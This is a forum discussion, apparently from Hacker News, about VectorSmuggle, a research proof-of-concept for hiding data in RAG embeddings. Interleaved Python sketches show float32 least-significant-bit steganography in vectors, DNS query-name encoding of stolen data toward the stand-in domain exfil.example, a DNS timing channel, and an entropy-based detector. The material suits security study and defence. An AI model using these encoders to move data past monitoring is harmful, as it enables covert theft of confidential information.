VectorSmuggle: Covertly Exfiltrate Data in Embeddings

https://github.com/jaschadub/VectorSmuggle
33•smugglereal•1d ago

Comments

smugglereal•1d ago
A comprehensive proof-of-concept demonstrating sophisticated vector-based data exfiltration techniques in AI/ML environments. This educational security research project illustrates potential risks in RAG systems and provides tools for defensive analysis.
acmiyaguchi•1d ago
The idea of using steganographic techniques to exfiltrate data is interesting, but I don't quite follow the general method outlined in the repository, either from the generated documentation or from the code. The threat model and case studies seem contrived. I find it hard to believe that folks would expose data via RAG that they wouldn't want users of the underlying system to be privy to.

There's too much fluff here to be useful. I imagine having something that is concise and concrete would make it more appealing to others. But as-is, it's missing a good technical summary and demonstration.

smugglereal•1d ago
Thanks for the feedback!

It's less about the RAG exposing new data to a regular user, and more about using the vector pipeline as a covert channel. The idea is to sneak out data the attacker already can access, but in a way that might bypass traditional DLP looking at emails, USBs, etc.
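To make the covert-channel idea concrete, here is a minimal sketch of one generic way data could ride inside an embedding: overwrite the least-significant mantissa bit of each float32 component with one payload bit. This is ordinary LSB steganography applied to vectors, assumed for illustration only. It is not taken from VectorSmuggle's scripts/embed.py, and `hide_bytes` / `recover_bytes` are hypothetical names. Relative to its float32 value, each component changes by at most one unit in the last place, so similarity search should behave essentially as before.

```python
import struct


def _f32_bits(x: float) -> int:
    # Round x to float32 and reinterpret it as a 32-bit unsigned integer.
    return struct.unpack("<I", struct.pack("<f", x))[0]


def _bits_f32(raw: int) -> float:
    # Inverse of _f32_bits: reinterpret 32 bits as a float32 value.
    return struct.unpack("<f", struct.pack("<I", raw))[0]


def hide_bytes(vector: list[float], payload: bytes) -> list[float]:
    """Hypothetical helper: store one payload bit in the lowest mantissa bit of each component."""
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(vector):
        raise ValueError("payload needs more bits than the vector has components")
    out = []
    for idx, x in enumerate(vector):
        raw = _f32_bits(x)
        if idx < len(bits):
            raw = (raw & ~1) | bits[idx]  # clear the LSB, then write the payload bit
        out.append(_bits_f32(raw))
    return out


def recover_bytes(vector: list[float], n_bytes: int) -> bytes:
    """Hypothetical helper: read the LSBs back; the receiver must already know n_bytes."""
    bits = [_f32_bits(x) & 1 for x in vector[: n_bytes * 8]]
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[k * 8 : (k + 1) * 8]))
        for k in range(n_bytes)
    )


if __name__ == "__main__":
    vec = [0.01 * i - 0.3 for i in range(384)]  # stand-in for a 384-dim embedding
    stego = hide_bytes(vec, b"secret")
    print(recover_bytes(stego, 6))  # prints b'secret'
```

A 384-dimensional vector carries at most 48 bytes this way. Anyone reading the stored vectors back (for example through a query script) can recover the payload, while a DLP tool inspecting emails or USB transfers never sees it.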

The "fluff" is largely educational material, as the project is for research and learning. For a concrete technical demonstration, the scripts/embed.py and scripts/query.py scripts are the core, and the docs/guides/quick_start.md tries to offer a direct path to seeing it in action.

Hope that helps! Will add a video demo soon.

anonymousiam•1d ago
Well over a decade ago, I recall learning about a covert data exfiltration method that could bypass firewalls by using DNS lookups. The payload would be a base64 hostname prefix attached to an evil domain. Adding a time stamp to the prefix data would guarantee uniqueness, and get around local caching DNS servers.
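A minimal sketch of the encoding step described above, assuming `exfil.example` as a stand-in for the evil domain. It builds query names only and sends nothing. One deliberate swap: it uses base32 rather than the base64 mentioned in the comment, because DNS names are case-insensitive and `+`, `/` and `=` are not valid hostname characters. The `seq-timestamp` label and the function names are hypothetical.

```python
import base64

MAX_LABEL = 63  # RFC 1035: a single DNS label is at most 63 octets


def to_query_names(data: bytes, domain: str, timestamp: int, chunk: int = 30) -> list[str]:
    """Hypothetical helper: split data into chunks, one DNS query name per chunk."""
    names = []
    for seq, start in enumerate(range(0, len(data), chunk)):
        # Base32, lowercased and unpadded, survives case-insensitive resolvers.
        label = base64.b32encode(data[start : start + chunk]).decode("ascii").rstrip("=").lower()
        if len(label) > MAX_LABEL:
            raise ValueError("chunk too large for one DNS label")
        # The seq-timestamp label orders the chunks and makes each name unique,
        # so caching resolvers cannot answer from cache and must forward every query.
        names.append(f"{label}.{seq}-{timestamp}.{domain}")
    return names


def from_query_names(names: list[str], domain: str) -> bytes:
    """Hypothetical helper: reassemble data from names seen by the domain's authoritative server."""
    chunks = []
    for name in names:
        label, meta = name[: -(len(domain) + 1)].split(".")
        seq = int(meta.split("-")[0])
        padded = label.upper() + "=" * (-len(label) % 8)  # restore base32 padding
        chunks.append((seq, base64.b32decode(padded)))
    return b"".join(part for _, part in sorted(chunks))
```

With the default 30-byte chunk each data label is 48 characters. The sketch does not check the 253-character limit on the full name, which only matters for long domains.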
DrScientist•23h ago
Yep - bottom line you just use a protocol you know the firewall won't/can't block.

In theory you don't even need anything in the payload - you could put information in the timing of the DNS requests, à la Morse code...
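A minimal sketch of such a timing channel, assuming the receiver can observe when queries arrive (for example in the authoritative server's logs). A short pause before the next query means 0 and a long pause means 1, so the query names themselves can be innocuous. The gap lengths and function names are hypothetical. A real channel would also need synchronization and error correction, which are omitted here.

```python
import random

# Hypothetical pause lengths (seconds) before the next query.
SHORT_GAP, LONG_GAP = 0.2, 0.8
THRESHOLD = (SHORT_GAP + LONG_GAP) / 2


def to_bits(data: bytes) -> list[int]:
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def from_bits(bits: list[int]) -> bytes:
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[k : k + 8]))
        for k in range(0, len(bits), 8)
    )


def encode_gaps(data: bytes) -> list[float]:
    """Sender side: each bit becomes the pause before the next query (short = 0, long = 1)."""
    return [LONG_GAP if bit else SHORT_GAP for bit in to_bits(data)]


def decode_gaps(observed: list[float]) -> bytes:
    """Receiver side: classify measured gaps against the midpoint threshold."""
    return from_bits([1 if gap > THRESHOLD else 0 for gap in observed])


if __name__ == "__main__":
    rng = random.Random(0)
    sent = encode_gaps(b"hi")
    # Simulated jitter of up to +/-0.2 s keeps every gap on the correct side of THRESHOLD.
    received = [gap + rng.uniform(-0.2, 0.2) for gap in sent]
    print(decode_gaps(received))  # prints b'hi'
```

The bandwidth is tiny (two bytes take 16 queries and several seconds), which fits the point below that small-scale leakage is hard to stop.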

HTTP is the obvious other one - with many more options for somebody to exfiltrate data - you can think of ways where you don't even need an evil domain.

For example - you could exfiltrate data via Hacker News comments!

As far as I can see, the only thing you can do in the end is make it harder, then monitor for unusual activity and hope that is enough to stop large-scale exfiltration, since small-scale exfiltration is impossible to stop.
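As one illustration of "monitor for unusual activity", here is a minimal heuristic sketch for the DNS case discussed above: flag query names whose longest label is both long and high-entropy, as encoded payload chunks tend to be. The thresholds (24 characters, 3.5 bits per character) are arbitrary assumptions, and the function names are hypothetical. Expect false positives (CDN and tracking hostnames) and false negatives (slow, short-label or purely timing-based channels).

```python
import math
from collections import Counter


def shannon_entropy(s: str) -> float:
    """Empirical Shannon entropy of a string, in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_exfil(qname: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Hypothetical heuristic: a long, high-entropy label suggests encoded data."""
    labels = qname.rstrip(".").split(".")
    longest = max(labels, key=len)
    return len(longest) >= min_len and shannon_entropy(longest) >= min_entropy


if __name__ == "__main__":
    print(looks_like_exfil("www.example.com"))  # prints False
    print(looks_like_exfil("abcdefghijklmnopqrstuvwxyz234567.0-1717600000.exfil.example"))  # prints True
```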

stephantul•1d ago
Literal attack vectors
